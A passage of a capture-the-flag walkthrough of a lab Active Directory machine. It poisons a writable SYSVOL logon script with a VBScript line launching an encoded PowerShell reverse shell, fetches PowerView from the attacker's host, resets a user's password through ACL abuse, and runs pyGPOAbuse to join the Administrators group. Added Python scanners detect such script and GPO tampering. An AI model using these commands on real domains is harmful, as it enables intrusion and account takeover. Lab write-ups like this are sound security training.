SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\library:library 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ,WRITE      
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs            READ,WRITE      
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL          READ            Logon server share 
oxdf@hacky$ netexec smb dc.baby2.vl -u Carl.Moore -p Carl.Moore --shares
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ,WRITE      
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs            READ,WRITE      
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL          READ            Logon server share

I’ll connect to the homes share as both, but there’s nothing new.

SYSVOL

The SYSVOL share has the script pointed to by the lnk file:

oxdf@hacky$ smbclient //dc.baby2.vl/SYSVOL -U Carl.Moore%Carl.Moore
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 17:37:36 2023
  ..                                  D        0  Tue Aug 22 17:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 17:37:36 2023

                6126847 blocks of size 4096. 1926165 blocks available
smb: \> cd baby2.vl\
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 17:43:55 2023
  ..                                  D        0  Tue Aug 22 17:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 17:43:55 2023
  Policies                            D        0  Tue Aug 22 17:37:41 2023
  scripts                             D        0  Mon Aug 25 08:30:39 2025

                6126847 blocks of size 4096. 1926165 blocks available
smb: \baby2.vl\> cd scripts\
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Mon Aug 25 08:30:39 2025
  ..                                  D        0  Tue Aug 22 17:43:55 2023
  login.vbs                           A      992  Sat Sep  2 14:55:51 2023

                6126847 blocks of size 4096. 1926165 blocks available

Interestingly, not only can I read it, but I can write to it (despite netexec reporting the share as read-only). netexec derives that permission by testing at the share root, but NTFS ACLs on a subdirectory such as scripts can still grant write, so it is worth testing a write in each directory rather than trusting the share listing:

smb: \baby2.vl\scripts\> put hosts login.vbs
putting file hosts as \baby2.vl\scripts\login.vbs (0.6 kb/s) (average 0.6 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Mon Aug 25 08:30:39 2025
  ..                                  D        0  Tue Aug 22 17:43:55 2023
  login.vbs                           A       43  Fri Sep 26 13:30:36 2025

                6126847 blocks of size 4096. 1926165 blocks available

The size of the file changes from 992 to 43.

Poison login.vbs

I’ve already seen that Amelia.Griffiths uses login.vbs as a logon script. Even without seeing that, given the shortcut file pointing at this script on SYSVOL, it’s reasonable to make a guess that this script is run on login by users in the domain.

Since I can write it, I can add code to it. I'll add VBScript that launches a PowerShell reverse shell (from revshells.com), keeping the original drive-mapping calls so the script still behaves normally for the user:

oxdf@hacky$ tail login-revshell.vbs 
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

Set cmdshell = CreateObject("Wscript.Shell")
cmdshell.run "powershell -e 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"
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
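
As an added defensive example (my code, not part of the writeup), a Python scanner that lists every WScript.Shell `.Run`/`.Exec` launch in a logon script and decodes any `powershell -e` payload, since that argument is base64 of the UTF-16LE command text and reviewing it in plain text is what a SYSVOL audit needs; the sample script and its harmless encoded command are constructed here.

```python
from __future__ import annotations
import base64
import re
from dataclasses import dataclass

# powershell.exe accepts -e, -ec, -enc and -encodedcommand; the argument is base64 of
# the UTF-16LE command text, so decoding it shows what the script would actually run.
_ENC_RE = re.compile(
    r"powershell(?:\.exe)?\s+(?:.*?\s)?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
# Any WScript.Shell .Run/.Exec call is worth listing: a drive-mapping script has no need for one.
_SHELL_RE = re.compile(r"\.(?:run|exec)\s+\"(.*)\"", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    launched: str        # the command string handed to WScript.Shell
    decoded: str | None  # decoded -EncodedCommand payload, if there was one

def encode_command(command: str) -> str:
    """Build the base64 form powershell -e expects (used here only to construct the sample)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")

def scan_logon_script(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        shell = _SHELL_RE.search(line)
        if not shell:
            continue
        enc = _ENC_RE.search(shell.group(1))
        decoded = decode_encoded_command(enc.group(1)) if enc else None
        findings.append(Finding(n, shell.group(1), decoded))
    return findings

# Constructed sample mirroring the poisoned login.vbs above, with a harmless encoded command.
_PAYLOAD = encode_command("Write-Output 'constructed sample'")
SAMPLE_SCRIPT = "\n".join([
    'Sub MapNetworkShare(sharePath, driveLetter)',
    '    Set objNetwork = CreateObject("WScript.Network")',
    '    objNetwork.MapNetworkDrive driveLetter & ":", sharePath',
    'End Sub',
    '',
    'Set cmdshell = CreateObject("Wscript.Shell")',
    'cmdshell.run "powershell -e ' + _PAYLOAD + '"',
    'MapNetworkShare "\\\\dc.baby2.vl\\apps", "V"',
])
```

Running the same scan against the copy of a script in SYSVOL after every change (or against a baseline copy) turns the size change noted above into a readable diff of what the script now executes.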

After about a minute, I get a shell at my listening nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.194.134 54175

PS C:\Windows\system32> whoami
baby2\amelia.griffiths

The user flag is at the root of the C: drive:

PS C:\> cat user.txt
42783b2c************************

Auth as GPOADM

Enumeration

Filesystem

There are no other meaningful users in C:\Users, and no files of interest in the Amelia.Griffiths user’s home directory.

The C: looks very standard:

PS C:\> ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/16/2025   2:27 AM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/16/2025   1:51 AM                Program Files
d-----         8/22/2023  10:30 AM                Program Files (x86)
d-----         8/22/2023   1:10 PM                shares
d-----         8/22/2023  12:35 PM                temp
d-r---         8/22/2023  12:54 PM                Users
d-----         8/20/2025   9:05 AM                Windows
-a----         4/16/2025   2:48 AM             32 user.txt  

Permissions

Amelia.Griffiths is in a couple of non-standard groups, office and legacy:

PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
BABY2\office                               Group            S-1-5-21-213243958-1766259620-4276976267-1104 Mandatory group, Enabled by default, Enabled group
BABY2\legacy                               Group            S-1-5-21-213243958-1766259620-4276976267-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192   

Back in the BloodHound data, the legacy group provides useful outbound control to Amelia.Griffiths:

[image: BloodHound graph of the legacy group’s outbound object control]

As a member of the legacy group, Amelia.Griffiths has WriteOwner and WriteDacl over both the GPOADM group and the GPO-Management OU.

Change Password

Lately I’ve shown a lot of cases of updating a password from my host. Here I don’t have creds for Amelia.Griffiths, so I’ll need to do it from BabyTwo. I’ll grab a copy of PowerView and host it on a Python webserver on my VM. I can fetch it to BabyTwo and import it:

PS C:\programdata> curl 10.10.14.204/PowerView.ps1 -outfile PowerView.ps1
PS C:\programdata> . .\PowerView.ps1

Now I’ll give Amelia.Griffiths permissions over the GPOADM account, and then set the password:

PS C:\programdata> Add-DomainObjectAcl -Rights all -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths
PS C:\programdata> $cred = ConvertTo-SecureString '0xdf0xdf.' -AsPlainText -Force
PS C:\programdata> Set-DomainUserPassword GPOADM -AccountPassword $cred

It works:

oxdf@hacky$ netexec smb dc.baby2.vl -u GPOADM -p 0xdf0xdf.
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\GPOADM:0xdf0xdf.

Shell as Administrators Group

Enumeration

The GPOADM account has GenericAll over two group policy objects (GPOs):

[image: BloodHound graph of GPOADM’s GenericAll over two GPOs]

These are marked as high value objects as they give full control over the domain. I need the GPO ID, which BloodHound gives:

[image: BloodHound node details showing the GPO ID]

Exploit GPO

I’ll use the pyGPOAbuse tool to get execution from a GPO. I’ll clone it to my host and make sure it has the metadata to run with uv:

oxdf@hacky$ git clone https://github.com/Hackndo/pyGPOAbuse.git
Cloning into 'pyGPOAbuse'...
remote: Enumerating objects: 127, done.
remote: Counting objects: 100% (90/90), done.
remote: Compressing objects: 100% (41/41), done.
remote: Total 127 (delta 63), reused 64 (delta 49), pack-reused 37 (from 1)
Receiving objects: 100% (127/127), 1.14 MiB | 9.36 MiB/s, done.
Resolving deltas: 100% (69/69), done.
oxdf@hacky$ cd pyGPOAbuse/

oxdf@hacky$ uv add --script pygpoabuse.py -r requirements.txt
Updated `pygpoabuse.py`

I need to feed the script auth for the user who can edit GPOs, the GPO id, and the command to run:

oxdf@hacky$ uv run --script pygpoabuse.py baby2.vl/GPOADM:0xdf0xdf. -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -command 'net localgroup administrators GPOADM /add' -f
[+] ScheduledTask TASK_0f3ad190 created!
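
As an added defensive example (my code, not from the writeup or pyGPOAbuse), a Python audit of a GPO’s Group Policy Preferences scheduled-task file, the place where a scheduled task added to a GPO lands on SYSVOL. It assumes the file is `Policies\{GPO-ID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` and that an immediately executed task appears as an `ImmediateTaskV2` element; the XML below is constructed, with the task name and command taken from the output above and the attributes trimmed.

```python
from __future__ import annotations
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample of Machine\Preferences\ScheduledTasks\ScheduledTasks.xml for one GPO
# (assumed path). The first entry is the kind of immediate task the writeup's step creates;
# the second is an ordinary recurring task for contrast.
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <ImmediateTaskV2 name="TASK_0f3ad190" changed="2025-09-26 13:45:00">
    <Properties action="C" name="TASK_0f3ad190" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Principals><Principal id="Author">
          <UserId>NT AUTHORITY\\System</UserId><RunLevel>HighestAvailable</RunLevel>
        </Principal></Principals>
        <Actions Context="Author"><Exec>
          <Command>cmd.exe</Command>
          <Arguments>/c net localgroup administrators GPOADM /add</Arguments>
        </Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="NightlyCleanup">
    <Properties action="C" name="NightlyCleanup" runAs="BABY2\\svc_cleanup" logonType="Password">
      <Task version="1.3"><Actions><Exec><Command>cleanup.exe</Command></Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Command fragments that change local group membership or accounts, or launch encoded PowerShell.
SUSPICIOUS = re.compile(r"localgroup\s+administrators|net\s+user\b|powershell.*\s-e(?:nc)?\b", re.I)

@dataclass
class TaskFinding:
    name: str
    immediate: bool   # ImmediateTaskV2 runs as soon as policy refreshes, rare in legitimate GPOs
    run_as: str
    command: str
    suspicious: bool

def audit_scheduled_tasks(xml_text: str) -> list[TaskFinding]:
    """Return one finding per task entry; immediate tasks and risky commands are flagged."""
    findings: list[TaskFinding] = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        if props is None:
            continue
        exe = props.find("Task/Actions/Exec")
        parts = [exe.findtext("Command"), exe.findtext("Arguments")] if exe is not None else []
        command = " ".join(p for p in parts if p)
        immediate = task.tag.startswith("ImmediateTask")
        findings.append(TaskFinding(task.get("name", ""), immediate, props.get("runAs", ""),
                                    command, immediate or bool(SUSPICIOUS.search(command))))
    return findings
```

Because the tool also advances the GPO’s version number so clients re-apply it, pairing this file audit with a watch on `versionNumber` changes for high-value GPOs such as the Default Domain Policy catches the edit before the next refresh runs the task.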

After a few seconds, GPOADM is in the Administrators group:

PS C:\programdata> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
gpoadm
library
The command completed successfully.

Now netexec shows “Pwn3d!” as well:

oxdf@hacky$ netexec smb dc.baby2.vl -u GPOADM -p 0xdf0xdf.
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\GPOADM:0xdf0xdf. (Pwn3d!)

Shell

I’ll use evil-winrm-py to get a shell:

oxdf@hacky$ evil-winrm-py -i dc.baby2.vl -u GPOADM -p 0xdf0xdf.
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'dc.baby2.vl:5985' as 'GPOADM'
evil-winrm-py PS C:\Users\gpoadm\Documents>

And the flag:

evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
29350096************************